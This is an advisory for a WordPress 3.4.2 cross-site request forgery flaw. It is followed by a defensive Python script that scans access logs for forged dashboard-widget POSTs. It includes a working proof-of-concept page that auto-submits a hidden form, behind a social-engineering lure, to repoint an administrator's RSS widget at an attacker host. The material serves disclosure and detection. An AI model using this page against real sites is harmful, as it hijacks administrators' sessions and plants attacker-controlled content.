source: https://www.securityfocus.com/bid/55660/info
WordPress is prone to a cross-site request-forgery vulnerability because the application fails to properly validate HTTP requests.
Exploiting this issue may allow a remote attacker to perform certain actions in the context of an authorized user's session and gain unauthorized access to the affected application; other attacks are also possible.
WordPress 3.4.2 is vulnerable; other versions may also be affected.

<body onload="javascript:document.forms[0].submit()">
<!-- The first form on the page is submitted automatically on load -->
<form action="http://TARGET_GOES_HERE/wp-admin/?edit=dashboard_incoming_links#dashboard_incoming_links" method="post" class="dashboard-widget-control-form">
<h1>How Many Girls You Have? xD))</h1>
<!-- Idea for you: Iframe it -->
<!-- Hidden field that sets the feed URL of the dashboard widget -->
<input name="widget-rss[1][url]" type="hidden" value="http://THINK_YOUR_SELF_HOW_YOU_CAN_USE_IT/test.php"/>
<select id="rss-items-1" name="widget-rss[1][items]">
<option value='1'>1</option><option value='2'>2</option><option value='3'>3</option><option value='4'>4</option><option value='5'>5</option>
<option value='6'>6</option><option value='7'>7</option><option value='8'>8</option><option value='9'>9</option><option value='10'>10</option>
<option value='11'>11</option><option value='12'>12</option><option value='13'>13</option><option value='14'>14</option><option value='15'>15</option>
<option value='16'>16</option><option value='17'>17</option><option value='18'>18</option><option value='19'>19</option><option value='20' selected='selected'>20</option>
</select>
<input id="rss-show-date-1" name="widget-rss[1][show_date]" type="checkbox" value="1" checked="checked"/>
<input type="hidden" name="widget_id" value="dashboard_incoming_links"/>
</form>
</body>
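A defender-side check for the request this form produces, as an added example that is not part of the original advisory: it scans Combined Log Format access-log lines for POSTs to the dashboard widget-edit URL whose Referer is absent or names another host. The host `blog.example`, the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: ip - user [time] "METHOD target PROTO" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)"'
)

def suspicious_widget_posts(lines, site_host):
    """Return (ip, time, referer) for dashboard-widget POSTs not referred by site_host."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        target = urlsplit(m["target"])
        # The "#dashboard_incoming_links" fragment never reaches the server,
        # so only the path and the "edit" query parameter can be matched.
        if not target.path.endswith(("/wp-admin/", "/wp-admin/index.php")):
            continue
        edit = parse_qs(target.query).get("edit", [""])[0]
        if not edit.startswith("dashboard_"):
            continue
        # A Referer of "-" (absent) yields no hostname and is reported too.
        ref_host = (urlsplit(m["referer"]).hostname or "").lower()
        if ref_host != site_host.lower():
            hits.append((m["ip"], m["time"], m["referer"]))
    return hits

# Constructed sample lines (not real traffic); blog.example is a placeholder host.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Oct/2012:10:00:01 +0000] "POST /wp-admin/?edit=dashboard_incoming_links HTTP/1.1" 302 0 "http://blog.example/wp-admin/?edit=dashboard_incoming_links" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Oct/2012:10:05:42 +0000] "POST /wp-admin/?edit=dashboard_incoming_links HTTP/1.1" 302 0 "http://other.example/page.html" "Mozilla/5.0"',
    '198.51.100.9 - - [01/Oct/2012:10:06:10 +0000] "POST /wp-admin/index.php?edit=dashboard_incoming_links HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [01/Oct/2012:10:07:00 +0000] "GET /wp-admin/?edit=dashboard_incoming_links HTTP/1.1" 200 5120 "http://other.example/page.html" "Mozilla/5.0"',
    '198.51.100.9 - - [01/Oct/2012:10:08:00 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, when, referer in suspicious_widget_posts(SAMPLE_LOG, "blog.example"):
        print(f"{when} {ip} widget POST with foreign or missing Referer: {referer}")
```

A hit is a lead for triage rather than proof, since some browsers and proxies strip the Referer header; access logs also do not record the POST body, so the submitted feed URL has to be checked in the widget's saved settings.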